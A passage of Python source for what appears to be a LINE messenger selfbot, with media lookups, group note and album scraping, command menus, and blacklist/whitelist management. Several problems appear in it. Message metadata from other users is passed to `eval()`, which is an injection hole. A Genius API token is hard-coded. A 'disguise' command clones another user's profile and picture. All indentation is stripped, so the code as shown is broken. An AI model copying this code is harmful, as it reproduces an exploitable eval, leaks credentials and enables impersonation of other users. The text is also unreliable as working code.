a+= "\nLike: "+humanize.intcomma(data1["result"]['likes'])
if data1["result"]['videolist'] != []:
a+= "\n\n 「 Video 」"
no = 0
for music in data1["result"]['videolist']:
no +=1
a+= '\n '+str(no)+'. '+music['resolution']+' '+music['extension']+' Size: '+music['size']
a+= '\n '+music['url']
if data1["result"]['audiolist'] != []:
a+= "\n\n 「 Audio 」"
nos = 0
for musics in data1["result"]['audiolist']:
nos +=1
a+= '\n '+str(nos)+'. '+musics['resolution']+' '+musics['extension']+' Size: '+musics['size']
a+= '\n '+musics['url']
self.sendMessage(to,str(a))
except:
self.sendMessage(to,'Error 404')
if len(kitsunesplit) == 2:
with youtube_dl.YoutubeDL({}) as ydl:
meta = ydl.extract_info('https://youtube.com/watch?v={}'.format(a["items"][int(kitsunesplit[1])-1]["id"]['videoId']), download=False)
self.sendImageWithURL(to,meta['thumbnail'])
adit = str(a["items"][int(kitsunesplit[1])-1]["id"]['videoId'])
try:
data1 = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q=https://www.youtube.com/watch?v='+adit)
a= " 「 LINK DL 」\nType: Youtube Video\n"
a+= "\nTitle: " + str(data1["result"]['title'])
a+= "\nDuration: " + str(data1["result"]['duration'])
a+= "\nAuthor: "+str(data1["result"]['author'])
a+= "\nLike: "+humanize.intcomma(data1["result"]['likes'])
if data1["result"]['videolist'] != []:
a+= "\n\n 「 Video 」"
no = 0
for music in data1["result"]['videolist']:
no +=1
a+= '\n '+str(no)+'. '+music['resolution']+' '+music['extension']+' Size: '+music['size']
a+= '\n '+music['url']
if data1["result"]['audiolist'] != []:
a+= "\n\n 「 Audio 」"
nos = 0
for musics in data1["result"]['audiolist']:
nos +=1
a+= '\n '+str(nos)+'. '+musics['resolution']+' '+musics['extension']+' Size: '+musics['size']
a+= '\n '+musics['url']
self.sendMessage(to,str(a))
except:
self.sendMessage(to,'Error 404')
if(cmk.startswith("youtube video ") or cmk.startswith("youtube audio ")):
if len(kitsunesplit) == 1:dfghj = self.adityasplittext(kolor,'s').replace('youtu.be/','youtube.com/watch?v=').replace('video ','').replace('audio ','');hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
if len(kitsunesplit) == 2:dfghj = 'https://www.youtube.com/watch?v='+a["items"][int(kitsunesplit[1])-1]["id"]['videoId'];hs = self.adityarequestweb('http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q='+dfghj)
if(cmk.startswith("youtube audio ")):sddd = [a['url'] for a in hs["result"]['audiolist'] if a['extension'] == 'm4a'];ghj= 'mp3';sdd = hs["result"]['videolist'][len(hs["result"]['audiolist'])-1]
if(cmk.startswith("youtube video ")):sdd = hs["result"]['videolist'][len(hs["result"]['videolist'])-1];ghj = sdd['extension']
hhhh = ' 「 Youtube 」\nJudul: {}\nDuration: {}\nEx: {}.{} {}\nSize: {}\nStatus: Waiting... For Upload'.format(hs['result']['title'],hs['result']['duration'],hs['result']['title'],ghj,sdd['resolution'],sdd['size'])
self.sendMessage(msg.to,hhhh, self.templatefoot('{}'.format(dfghj),'https://cdn3.iconfinder.com/data/icons/follow-me/256/YouTube-512.png',hs['result']['title']))
if(cmk.startswith("youtube audio ")):self.sendAudioWithURL(to,sddd[0])
if(cmk.startswith("youtube video ")):self.sendVideoWithURL(to,sdd['url'])
if msg.text.lower().startswith("youtube search "):
if a["items"] != []:
no = 0
ret_ = "╭──「 Youtube 」\n│Type: Youtube Video"
for music in a["items"]:
no += 1
asd = "\n│{}. {}".format(no,music['snippet']['title'])
if no == len(a["items"]):ss='╰'
else:ss='│'
if len(asd) >= 30:
if no == len(a["items"]):ghj = ''
else:ghj = "\n{} {}".format(ss,music['snippet']['title'][30:])
ret_ +="\n{}{}. {}{}".format(ss,no,music['snippet']['title'][:31],ghj)
else:ret_ += "\n{}{}. {}".format(ss,no,music['snippet']['title'])
self.sendMessage(to,ret_)
else:
self.sendMessage(to,"Type: Search Youtube Video\nStatus: "+str(self.adityasplittext(msg.text,'s'))+" not found")
def adityarequestweb(self,url):
r = requests.get("{}".format(url))
data = r.text
data = json.loads(data)
return data
def GroupPost(self,msg,wait):
to = msg.to
data = self.getGroupPost(to)
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'get note':
if data['result'] != []:
try:
no = 0
b = []
a = " 「 Groups 」\nGet Note"
for i in data['result']['feeds']:
b.append(i['post']['userInfo']['writerMid'])
try:
for aasd in i['post']['contents']['textMeta']:b.append(aasd['mid'])
except:pass
no += 1
gtime = i['post']['postInfo']['createdTime']
try:g = i['post']['contents']['text'].replace('@','@!')
except:g="None"
if no == 1:sddd = '\n'
else:sddd = '\n\n'
a +="{}{}. Penulis : @!\nDescription: {}\nTotal Like: {}\nCreated at: {}".format(sddd,no,g,i['post']['postInfo']['likeCount'],humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
a +="Status: Success Get "+str(data['result']['homeInfo']['postCount'])+" Note"
self.sendMention(to,a,'',b)
except Exception as e:
return self.sendMessage(to,"「 Auto Respond 」\n"+str(e))
if msg.text.lower().startswith('get note '):
try:
music = data['result']['feeds'][int(msg.text.split(' ')[2]) - 1]
b = [music['post']['userInfo']['writerMid']]
try:
for a in music['post']['contents']['textMeta']:b.append(a['mid'])
except:pass
try:
g= "\n\nDescription:\n"+str(music['post']['contents']['text'].replace('@','@!'))
except:
g=""
a="\n Total Like: "+str(music['post']['postInfo']['likeCount'])
a +="\n Total Comment: "+str(music['post']['postInfo']['commentCount'])
gtime = music['post']['postInfo']['createdTime']
a +="\n Created at: "+str(humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
a += g
zx = ""
zxc = " 「 Groups 」\nGet Note\n Penulis : @!"+a
try:
self.sendMention(to,zxc,'',b)
except Exception as e:
self.sendMessage(to, str(e))
try:
for c in music['post']['contents']['media']:
params = {'userMid': self.getProfile().mid, 'oid': c['objectId']}
path = self.server.urlEncode(self.server.LINE_OBS_DOMAIN, '/myhome/h/download.nhn', params)
if 'PHOTO' in c['type']:
try:
self.sendImageWithURL(to,path,'POST')
except:pass
else:
pass
if 'VIDEO' in c['type']:
try:
self.sendVideoWithURL(to,path)
except:pass
else:
pass
except:
pass
except Exception as e:
return self.sendMessage(to," 「 Auto Respons 」\n"+str(e))
def disguiseons(self,msg):
to=msg.to
if 'MENTION' in msg.contentMetadata:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.cloneContactProfile(key1)
group = self.getContact(key1);contact = "http://dl.profile.line-cdn.net/" + group.pictureStatus;self.sendImageWithURL(to,contact,'DISGUISE')
self.sendMention(to, ' 「 Copy Profile 」\n- Target: @!\n- Status: Success Copy profile♪','',[key1])
def fancynamehelp(self,wait,dd):
if 'timer' not in wait['talkban']:
wait['talkban']['timer'] = 60
if 'name' not in wait['talkban']:
wait['talkban']['name'] = self.getProfile().displayName
try:
if wait['timeline'] == False:wait['timeline'] = []
except:pass
if wait['ChangeCover'] == True:d = '\n│State: ON\n│Timer: {}second'.format(wait['talkban']['timer'])
else:d = '\n│State: OFF'
if wait["timeline"] == []:
a='None'
else:
a = ""
for b in wait["timeline"]:
a+= '\n│'+b
return "┌───「 Fancy Name 」───────\n│Backup Name: "+dd+"\n│FancyName Set:"+a+d+"\n│ | Command | \n│Set Name\n│ Key: "+wait["setkey"].title()+" fancyname set [enter|name]\n│Set Time\n│ Key: "+wait["setkey"].title()+" fancyname on [time]\n└────────────"
def lagulagu(self,wait):return "╭───「 Music 」─\n│ | Command | \n│Search Music\n│ Key: "+wait["setkey"].title()+" soundcloud [query]\n│Detail Music\n│ Key: "+wait["setkey"].title()+" soundcloud [query|num]\n│Lyric\n│ Key: "+wait["setkey"].title()+" lyric [judul]\n╰──────"
def copy(self,wait):return "╭───「 Disguise 」─\n│ | Command | \n│Disguise ON\n│ Key: "+wait["setkey"].title()+" disguise on [@]\n│Disguise OFF\n│ Key: "+wait["setkey"].title()+" disguise off\n│Disguise Setdefault\n│ Key: "+wait["setkey"].title()+" disguise setdefault\n╰──────"
def steal(self,wait):return "╭───「 Steal 」─\n│ | Command | \n│Get Profile Picture\n│ Key: "+wait["setkey"].title()+" steal pp [@]\n│Get Cover Picture\n│ Key: "+wait["setkey"].title()+" steal cover [@]\n│Get ID\n│ Key: "+wait["setkey"].title()+" getid, getid [@|num]\n╰──────"
def movie(self,wait):return "╭───「 Movie 」─\n│ | Command | \n│Search Movie\n│ Key: "+wait["setkey"].title()+" movie [query]\n│Search Detail Movie\n│ Key: "+wait["setkey"].title()+" movie [query|1]\n╰──────"
def keep(self,wait):return "╭───「 MEME 」─\n│ | Command | \n│List\n│ Key: "+wait["setkey"].title()+" memelist\n│MemeGen\n│ Key: "+wait["setkey"].title()+" meme [text|text|num]\n│ Key: "+wait["setkey"].title()+" meme [text|num]\n│ Key: "+wait["setkey"].title()+" meme [text|text]\n╰──────"
def image(self,wait):return "╭───「 Image 」─\n│ | Command | \n│Google Image\n│ Key: "+wait["setkey"].title()+" gimage [query]\n│Artstation Image\n│ Key: "+wait["setkey"].title()+" artimage [query]\n│Image Generator\n│ Water Color\n│ Key: "+wait["setkey"].title()+" watercolor [url]\n│ Key: "+wait["setkey"].title()+" watercolor on\n│ Drawing Image\n│ Key: "+wait["setkey"].title()+" drawimage [url]\n│ Key: "+wait["setkey"].title()+" drawimage on\n╰──────"
def kaskus(self,wait):return "╭───「 Kaskus 」─\n│ | Command | \n│Hot Thread\n│ Key: "+wait["setkey"].title()+" kaskus ht\n│Hot Thread Detail\n│ Key: "+wait["setkey"].title()+" kaskus ht [num]\n╰──────"
def instagram(self,wait):return "╭───「 Instagram 」─\n│ | Command | \n│Search Instagram\n│ Key: "+wait["setkey"].title()+" instagram [username]\n│Search Instagram Post\n│ Key: "+wait["setkey"].title()+" instagram [username] [num]\n│Search Instagram Story\n│ Key: "+wait["setkey"].title()+" instastory [username] [num]\n╰──────"
def youtube(self,wait):return "╭───「 Youtube 」─\n│ | Command | \n│Search\n│ Key: "+wait["setkey"].title()+" youtube search [query]\n│MP4\n│ Key: "+wait["setkey"].title()+" youtube video [query|num]\n│ Key: "+wait["setkey"].title()+" youtube video [url]\n│Downloader\n│ Key: "+wait["setkey"].title()+" youtube download [query|num]\n│ Key: "+wait["setkey"].title()+" youtube download [url]\n│MP3\n│ Key: "+wait["setkey"].title()+" youtube audio [query|num]\n│ Key: "+wait["setkey"].title()+" youtube audio [url]\n│Info\n│ Key: "+wait["setkey"].title()+" youtube info [query|num]\n│ Key: "+wait["setkey"].title()+" youtube info [url]\n╰──────"
def media(self,wait):return "╭─「 Media 」─\n│ | Command | \n│Qur'an\n│ Key: "+wait["setkey"].title()+" qur'an\n│Word\n│ Key: "+wait["setkey"].title()+" word\n│Image\n│ Key: "+wait["setkey"].title()+" image\n│Youtube\n│ Key: "+wait["setkey"].title()+" youtube\n│Music\n│ Key: "+wait["setkey"].title()+" music\n│Instagram\n│ Key: "+wait["setkey"].title()+" instagram\n│Kaskus\n│ Key: "+wait["setkey"].title()+" kaskus\n│Anime\n│ Key: "+wait["setkey"].title()+" anime\n│Webtoon\n│ Key: "+wait["setkey"].title()+" webtoon\n│Meme\n│ Key: "+wait["setkey"].title()+" meme\n╰──────"
def quran(self,wait):return "╭─「 Qur'an 」─\n│ | Command | \n│Daftar Surah\n│ key: "+wait["setkey"].title()+" quranlist\n│Get Ayat Surah\n│ key: "+wait["setkey"].title()+" qur'an [numsurah]\n│ key: "+wait["setkey"].title()+" qur'an [numsurah] [1|<|>|-]\n╰──────"
def webtoon(self,wait):return "╭─「 Webtoon 」─\n│ | Command | \n│Drama\n│ key: "+wait["setkey"].title()+" webtoon drama\n│ key: "+wait["setkey"].title()+" webtoon drama [num]\n│Fantasi\n│ key: "+wait["setkey"].title()+" webtoon fantasi\n│ key: "+wait["setkey"].title()+" webtoon fantasi [num]\n│Comedy\n│ key: "+wait["setkey"].title()+" webtoon comedy\n│ key: "+wait["setkey"].title()+" webtoon comedy [num]\n│Slice of Life\n│ key: "+wait["setkey"].title()+" webtoon sol\n│ key: "+wait["setkey"].title()+" webtoon sol [num]\n│Romance\n│ key: "+wait["setkey"].title()+" webtoon romance\n│ key: "+wait["setkey"].title()+" webtoon romancethriller [num]\n│Thriller\n│ key: "+wait["setkey"].title()+" webtoon thriller\n│ key: "+wait["setkey"].title()+" webtoon thriller [num]\n│Horror\n│ key: "+wait["setkey"].title()+" webtoon horror\n│ key: "+wait["setkey"].title()+" webtoon horror [num]\n╰──────"
def anime(self,wait):return "╭─「 Anime 」─\n│ | Command | \n│Anime List\n│ key: "+wait["setkey"].title()+" anilist\n│ key: "+wait["setkey"].title()+" anilist [num]\n│ key: "+wait["setkey"].title()+" anilist [num] [numepisode]\n│Mangakyo\n│ Cek Page Manga\n│ key: "+wait["setkey"].title()+" mangakyo \n│ key: "+wait["setkey"].title()+" mangakyo page [num]\n╰──────"
def word(self,wait):return "╭─「 Word 」─\n│ | Command | \n│Urban\n│ Key: "+wait["setkey"].title()+" urban [query]\n│KBBI\n│ Key: "+wait["setkey"].title()+" kbbi [query]\n│Wikipedia\n│ Key: "+wait["setkey"].title()+" wikipedia [query]\n╰──────"
def autoreadon(self,wait):return " 「 Auto Read 」\nUsage:"+wait["setkey"]+" autoread on <trigger>\nTrigger:\n1 - Personal\n2 - Group"
def autoreadoff(self,wait):return " 「 Auto Read 」\nUsage:"+wait["setkey"]+" autoread off <trigger>\nTrigger:\n1 - Personal\n2 - Group"
def list(self,wait):return "╭───「 List 」─\n│ | Command | \n│Group\n│ Key: "+wait["setkey"].title()+" grouplist\n│Square\n│ Key: "+wait["setkey"].title()+" squarelist\n│Sticker\n│ Key: "+wait["setkey"].title()+" list sticker\n│Image\n│ Key: "+wait["setkey"].title()+" list pict\n│WhiteList\n│ Key: "+wait["setkey"].title()+" whitelist\n│BlackList\n│ Key: "+wait["setkey"].title()+" blacklist\n│MimicList\n│ Key: "+wait["setkey"].title()+" mimiclist\n╰──────"
def group(self,wait):return "╭───「 Group 」─\n│ | Command | \n│Auto Respon\n│ Key: "+wait["setkey"].title()+" autorespon\n│Welcome Message\n│ Key: "+wait["setkey"].title()+" welcomemsg\n│Leave Message\n│ Key: "+wait["setkey"].title()+" leavemsg\n│Search Contact\n│ Key: "+wait["setkey"].title()+" get group [@]\n│Get Note\n│ Key: "+wait["setkey"].title()+" get note\n│ Key: "+wait["setkey"].title()+" get note [num]\n│Get Album\n│ Key: "+wait["setkey"].title()+" get album\n│ Key: "+wait["setkey"].title()+" get album [1] [<|>|-|num]\n╰──────"
def friend(self,wait):return "╭───「 Friend 」─\n│ | Command | \n│List Friends\n│ Key: "+wait["setkey"].title()+" friendlist\n│Del Friend\n│ Key: "+wait["setkey"].title()+" del friend [on|<|>|-|@|num]\n│BlockList\n│ Key: "+wait["setkey"].title()+" blocklist\n│Del Block\n│ Key: "+wait["setkey"].title()+" del block [<|>|-|num]\n╰──────"
def Announcementssa(self,wait):return "╭───「 Announcements 」─\n│ | Command | \n│Create Announcements\n│ Key: "+wait["setkey"].title()+" announ create lock [text]\n│ Key: "+wait["setkey"].title()+" announ create unlock [text]\n│ Key: "+wait["setkey"].title()+" announ create all [text]\n│Announcements Del\n│ Key: "+wait["setkey"].title()+" announ clear\n│Get Announcements\n│ Key: "+wait["setkey"].title()+" get announ\n│ Key: "+wait["setkey"].title()+" get announ [num]\n╰──────"
def mykeyoff(self,wait):wait["setkey"] = "";return " 「 Rname 」\nKey has been set to DISABLED♪"
def mykeyreset(self,wait):wait["setkey"] = "anbot";return " 「 Rname 」\nKey has been set to "+wait["setkey"].title()
def github(self,wait):return"╭───「 Github 」─\n│ | Command | \n│Search User\n│ Key: "+wait["setkey"].title()+" github [username]\n│Search User Followers\n│ Key: "+wait["setkey"].title()+" gitfol [username]\n│Search User Repository\n│ Key: "+wait["setkey"].title()+" gitrepos [username]\n╰──────"
def profdetail(self,wait):return "╭───「 Profile 」─\n│ | Command | \n│Change Profile Picture\n│ Key: "+wait["setkey"].title()+" changedp\n│ Key: "+wait["setkey"].title()+" changedp video\n│Change Group Picture\n│ Key: "+wait["setkey"].title()+" changedp group\n│Change Name\n│ Key: "+wait["setkey"].title()+" myname [text]\n│Change Status\n│ Key: "+wait["setkey"].title()+" mybio [enter|text]\n╰──────"
def broadcast(self,wait):return "╭───「 Broadcast 」─\n│ | Command | \n│All\n│ Key: "+wait["setkey"].title()+" broadcast 1 [text]\n│Contact\n│ Key: "+wait["setkey"].title()+" broadcast 2 [text]\n│Group\n│ Key: "+wait["setkey"].title()+" broadcast 3 [text]\n╰──────"
def autjoin(self,wait,msg):
if wait['autoJoin'] == True:
msgs=" 「 Auto Join 」\nState: ENABLED♪\nState: "+str(wait["Members"])+" Available join\n"
else:
msgs=" 「 Auto Join 」\nState: DISABLED♪\nState: "+str(wait["Members"])+" Available join\n"
self.sendMessage(msg.to, msgs+"\n |Command|\n- Autojoin group\n Usage:"+wait["setkey"]+" autojoin [on|off]\n- Set minimum members\n Usage:"+wait["setkey"]+" autojoin set <num>")
def aborted(self,wait,msg):
a = ' 「 Abort 」'
try:
if wait['talkban']['cvp'] == True:
wait['talkban']['pict'] = ''
wait['talkban']['cvp'] = False
except:
wait['talkban']['pict'] = ''
wait['talkban']['cvp'] = False
a+= '\nChange Profile Video cancelled'
if wait["Addimage"] == True:
wait["Addimage"] = False
a+= '\nAdd Pict cancelled'
if wait["ChangeDP"] == True:
wait["ChangeDP"] = False
a+= '\nChangeDP cancelled'
if msg.to in wait["setTimess"]:
wait["setTimess"].remove(msg.to)
a+= '\nChangeDP Group cancelled'
return a
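# lyric(): looks up a song on the Genius search API (the access token is
# hard-coded into the URL), scrapes the lyrics div from the song page with
# BeautifulSoup, and sends the text in chunks of at most 10000 characters,
# e.g. self.lyric(msg.to, "bohemian rhapsody").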
def lyric(self,to,text):
try:
r = requests.get("https://api.genius.com/search?q="+text+"&access_token=2j351ColWKXXVxq1PdUNXDYECI2x4zClLyyAJJkrIeX8K7AQ0F-HTmWfG6tNVszO")
data = r.json()
hits = data["response"]["hits"][0]["result"]["api_path"]
title= "\nTitle: "+data["response"]["hits"][0]["result"]["title"].strip()
oleh = "\nArtis: "+data["response"]["hits"][0]["result"]["primary_artist"]["name"].strip()
g = data["response"]["hits"][0]["result"]['song_art_image_thumbnail_url']
r1 = requests.get("https://api.genius.com"+hits+"?&access_token=2j351ColWKXXVxq1PdUNXDYECI2x4zClLyyAJJkrIeX8K7AQ0F-HTmWfG6tNVszO")
data1 = r1.json()
path = data1["response"]["song"]["path"]
release = data1["response"]["song"]["release_date"]
page_url = "http://genius.com" + path
page = requests.get(page_url)
html = BeautifulSoup(page.text, "html.parser")
[h.extract() for h in html('script')]
lyrics = html.find("div", class_="lyrics").get_text().strip()
pesan = " 「 Lyric 」"+title+oleh+'\n'+lyrics
k = len(pesan)//10000
for aa in range(k+1):
self.sendMessage(to,'{}'.format(pesan[aa*10000 : (aa+1)*10000]))
except:
self.sendMessage(to,"「 404 」\nStatus: Error\nReason: I'cant found lyric {}".format(text))
def eksekusilurk(self,op,wait):
try:
if op.param1 in wait['readPoint']:
if op.param2 in wait['ROM1'][op.param1]:
wait['setTime'][op.param1][op.param2] = op.createdTime
else:
wait['ROM1'][op.param1][op.param2] = op.param2
wait['setTime'][op.param1][op.param2] = op.createdTime
try:
if wait['lurkauto'] == True:
if len(wait['setTime'][op.param1]) % 5 == 0:
self.anulurk(op.param1,wait)
except:pass
elif op.param2 in wait['readPoints']:
wait['lurkt'][op.param1][op.param2][op.param3] = op.createdTime
wait['lurkp'][op.param1][op.param2][op.param3] = op.param2
else:pass
except:
pass
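# blekedok(): scrapes https://www.webtoons.com/id/genre and, for the t-th genre
# card list, returns either its 'info' blocks (tt == 'data') or its anchor tags.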
def blekedok(self,t:int=None,tt:str=None):
r = requests.get('https://www.webtoons.com/id/genre')
soup = BeautifulSoup(r.text,'html5lib')
data = soup.find_all(class_='card_lst')
datea = data[t].find_all(class_='info')
if tt == 'data':
return datea
else:
return data[t].find_all('a')
def kbbi(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
data = KBBI(self.adityasplittext(msg.text.lower()))
self.sendMessage(msg.to,'{}'.format(data))
def wikipedia(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:
wiki = WikiApi({'locale' : 'id'})
result = wiki.find(self.adityasplittext(msg.text.lower()))
b = random.randint(0,len(result)-1)
article = wiki.get_article(result[b])
a=" 「 Wikipedia 」\nType: Wikipedia Definition\nData: Wikipedia {} #{} from #{}".format(self.adityasplittext(msg.text.lower()),b+1,len(result))
a+= "\nSummary:\n{}".format(article.summary)
self.sendMessage(msg.to,a, self.templatefoot(article.url,"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
except:
self.sendMessage(msg.to," 「 Wikipedia 」\nType: Wikipedia Definition\nData: Wikipedia {} Not Found".format(self.adityasplittext(msg.text.lower())), self.templatefoot('line://ti/p/~{}'.format(self.profile.userid),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
def urbandata(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:
data = self.adityarequestweb('http://api.urbandictionary.com/v0/define?term={}'.format(self.adityasplittext(msg.text.lower())))
b = random.randint(0,len(data['list'])-1)
a=" 「 Urban 」\nType: Urban Definition\nData: Urban {} #{} from #{}".format(self.adityasplittext(msg.text.lower()),b+1,len(data['list']))
a+= "\nAuthor: {}\nDictionary:\n{}\n\nExample: {}".format(data['list'][b]['author'],data['list'][b]['definition'],data['list'][b]['example'])
self.sendMessage(msg.to,a, self.templatefoot(data['list'][b]['permalink'],"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,data['list'][b]['word']))
except:
self.sendMessage(msg.to," 「 Urban 」\nType: Urban Definition\nData: Urban {} Not Found".format(self.adityasplittext(msg.text.lower())), self.templatefoot('line://ti/p/~{}'.format(self.profile.userid),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,self.adityasplittext(msg.text.lower())))
def WebtoonDrama(self,msg):
msg.text = self.mycmd(msg.text,wait)
drama = msg.text.split(' ')[1].lower()
try:
if drama == 'drama':aa = 0
if drama == 'fantasi':aa = 1
if drama == 'comedy':aa = 2
if drama == 'sol':aa = 3
if drama == 'romance':aa = 4
if drama == 'thriller':aa = 5
if drama == 'horror':aa = 6
a = self.blekedok(aa,'data')
try:
if int(msg.text.split(' ')[2]) > len(a):
return self.sendMessage(msg.to,' 「 Webtoon 」\nWebtoon {} list entry {} not found'.format(drama.title(),msg.text.split(' ')[2]))
gd = self.blekedok(aa)[int(msg.text.split(' ')[2])-1].get('href')
b = requests.get(gd)
soup1 = BeautifulSoup(b.text,'html5lib')
data11 = soup1.find_all(class_='subj')
data1 = soup1.find_all(class_='date')
data2 = soup1.find_all(id='_listUl')
data3 = data2[0].find_all('a')
A = ' 「 Webtoon 」\n | {} |'.format(a[int(msg.text.split(' ')[2])-1].find_all('p')[0].text)
for c in range(0,10):
if c+1 == 1:AA = '\n'
else:AA = '\n\n'
A+= '{}{}. {} | {}\n {}'.format(AA,c+1,data11[c+1].text,data1[c].text.strip(),data3[c].get('href'))
self.sendMessage(msg.to,A)
except:
A = ' 「 Webtoon 」\n | {} |'.format(drama.replace('sol','slice of life').title())
no=0
for b in a:
no+=1
if no == 1:AA = '\n'
else:AA = '\n\n'
if len(str(no)) == 1:cdd = '\n Author: {}'.format(b.find_all('p')[1].text)
if len(str(no)) == 2:cdd = '\n Author: {}'.format(b.find_all('p')[1].text)
A+= '{}{}. {} | {} Like{}'.format(AA,no,b.find_all('p')[0].text[:20],b.find_all('p')[2].find_all('em')[0].text,cdd)
self.sendMessage(msg.to,A)
except Exception as e:self.sendMessage(msg.to,str(e))
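# albumNamaGrup(): 'get album' lists a group's albums with photo counts;
# 'get album [n] [selection]' downloads the selected photos to temporary PNGs,
# sends them, then deletes the files. The remaining form flags wait['ChangeGDP']
# so a later-sent picture is presumably added to the chosen album elsewhere.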
def albumNamaGrup(self,msg,wait):
to = msg.to
ha = self.getGroupAlbum(to)
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'get album':
a = [a['title'] for a in ha['result']['items']];c=[a['photoCount'] for a in ha['result']['items']]
b = '╭「 Album Group 」'
no=0
for i in range(len(a)):
no+=1
if no == len(a):b+= '\n╰{}. {} | {}'.format(no,a[i],c[i])
else:b+= '\n│{}. {} | {}'.format(no,a[i],c[i])
self.sendMessage(to,"{}".format(b))
if msg.text.lower().startswith('get album '):
a = msg.text.split(' ')
selection = AdityaSplitGood(a[3],range(1,len(ha['result']['items'])+1))
for i in selection.parse():
try:
b = random.randint(0,999)
self.getImageGroupAlbum(msg.to,ha['result']['items'][int(a[2])-1]['id'], ha['result']['items'][int(a[2])-1]['recentPhotos'][i-1]['oid'], returnAs='path', saveAs='{}.png'.format(b))
self.sendImage(msg.to,'{}.png'.format(b))
os.remove('{}.png'.format(b))
except:continue
else:
a = msg.text.split(' ')
if len(a) == 5:
wait["Images"]['anu']=ha['result']['items'][int(a[4])-1]['id']
wait['ChangeGDP'] = True
self.sendMessage(msg.to," 「 Album 」\nSend a Picture for add to album")
def datamention(self,msg,text,data,ps=''):
if(data == [] or data == {}):return self.sendMention(msg.to," 「 {} 」\nSorry @! no data found".format(text),text,[msg._from])
k = len(data)//100
for aa in range(k+1):
if aa == 0:dd = '╭「 {} 」─{}'.format(text,ps);no=aa
else:dd = '├「 {} 」─{}'.format(text,ps);no=aa*100
msgas = dd
for i in data[aa*100 : (aa+1)*100]:
no+=1
if no == len(data):msgas+='\n╰{}. @!'.format(no)
else:msgas+='\n│{}. @!'.format(no)
self.sendMention(msg.to, msgas,' 「 {} 」'.format(text), data[aa*100 : (aa+1)*100])
def mentionalfl(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('friendlist '):
if len(msg.text.split(' ')) == 2:
a = self.refreshContacts()
self.getinformation(msg.to,a[int(msg.text.split(' ')[1])-1],wait)
if msg.text.lower() == 'friendlist':a = self.refreshContacts();self.datamention(msg,'List Friend',a)
if msg.text.lower() == 'friend request':
a = self.getRecommendationIds()
self.sendMessage(msg.to,'{}'.format(a)[:10000])
if msg.text.lower() == 'blocklist':a = self.getBlockedRecommendationIds();self.datamention(msg,'List Block',a)
def datamentions(self,msg,text,data,date,wait,ps=''):
if(data == [] or data == {}):return self.sendMention(msg.to," 「 {} 」\nSorry @! no data found".format(text),text,[msg._from])
k = len(data)//100
for aa in range(k+1):
if aa == 0:dd = '╭「 {} 」─{}'.format(text,ps);no=aa
else:dd = '├「 {} 」─{}'.format(text,ps);no=aa*100
msgas = dd
for i in data[aa*100 : (aa+1)*100]:
no+=1
if date == 'ADDWL':
if i in wait["bots"]:a = 'WL User'
else:
if i not in wait["blacklist"]:a = 'Add WL';wait["bots"].append(i)
else:a = 'BL User'
if date == 'DELWL':
try:wait["bots"].remove(i);a = 'Del WL'
except:a = 'Not WL User'
if date == 'ADDBL':
if i in wait["bots"]:a = 'WL User'
else:
if i not in wait["blacklist"]:a = 'Add BL';wait["blacklist"].append(i)
else:a = 'BL User'
if date == 'DELBL':
try:wait["blacklist"].remove(i);a = 'Del BL'
except:a = 'Not BL User'
if date == 'DELFL':
try:self.AdityadeleteContact(i);a = 'Del Friend'
except:a = 'Not Friend User'
if date == 'ADDML':
if i in wait["target"]:a = 'ML User'
else:a = 'Add ML';wait["target"].append(i)
if date == 'DELML':
try:wait["target"].remove(i);a = 'Del ML'
except:a = 'Not ML User'
if no == len(data):msgas+='\n╰{}. @!{}'.format(no,a)
else:msgas+='\n│{}. @!{}'.format(no,a)
self.sendMention(msg.to, msgas,' 「 {} 」'.format(text), data[aa*100 : (aa+1)*100])
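# ekseuksi(): dispatcher for whitelist/blacklist/mimic-list/friend maintenance.
# Mentioned targets are handled by datamentions(); otherwise the numeric/range
# argument is resolved against the stored lists through adityaarchi().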
def ekseuksi(self,wait,msg):
to = msg.to
msg.text = self.mycmd(msg.text,wait)
dits = msg.text.lower()
if 'MENTION' in msg.contentMetadata.keys()!=None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
if dits.startswith('addbl '):self.datamentions(msg,'Blacklist',targets,'ADDBL',wait,ps='\n├ Type: Add Blacklist')
elif dits.startswith('delbl '):self.datamentions(msg,'Blacklist',targets,'DELBL',wait,ps='\n├ Type: Delete Blacklist')
elif dits.startswith('addwl '):self.datamentions(msg,'Whitelist',targets,'ADDWL',wait,ps='\n├ Type: Add Whitelist')
elif dits.startswith('delwl '):self.datamentions(msg,'Whitelist',targets,'DELWL',wait,ps='\n├ Type: Delete Whitelist')
elif dits.startswith('addml '):self.datamentions(msg,'Mimiclist',targets,'ADDML',wait,ps='\n├ Type: Add Mimiclist')
elif dits.startswith('delml '):self.datamentions(msg,'Mimiclist',targets,'DELML',wait,ps='\n├ Type: Delete Mimiclist')
elif dits.startswith('del friend '):self.datamentions(msg,'Friendlist',targets,'DELFL',wait,ps='\n├ Type: Delete Friendlist')
else:
if dits.startswith('delbl '):self.adityaarchi(wait,'Blacklist','delbl',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Blacklist',nama=wait['blacklist'])
if dits.startswith('delwl '):self.adityaarchi(wait,'Whitelist','delwl',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Whitelist',nama=wait['bots'])
if dits.startswith('delml '):self.adityaarchi(wait,'Mimiclist','delml',to,self.adityasplittext(msg.text),msg,'\n├ Type: Delete Mimiclist',nama=wait['target'])
if dits.startswith('del friend ') or dits == 'del friend on':
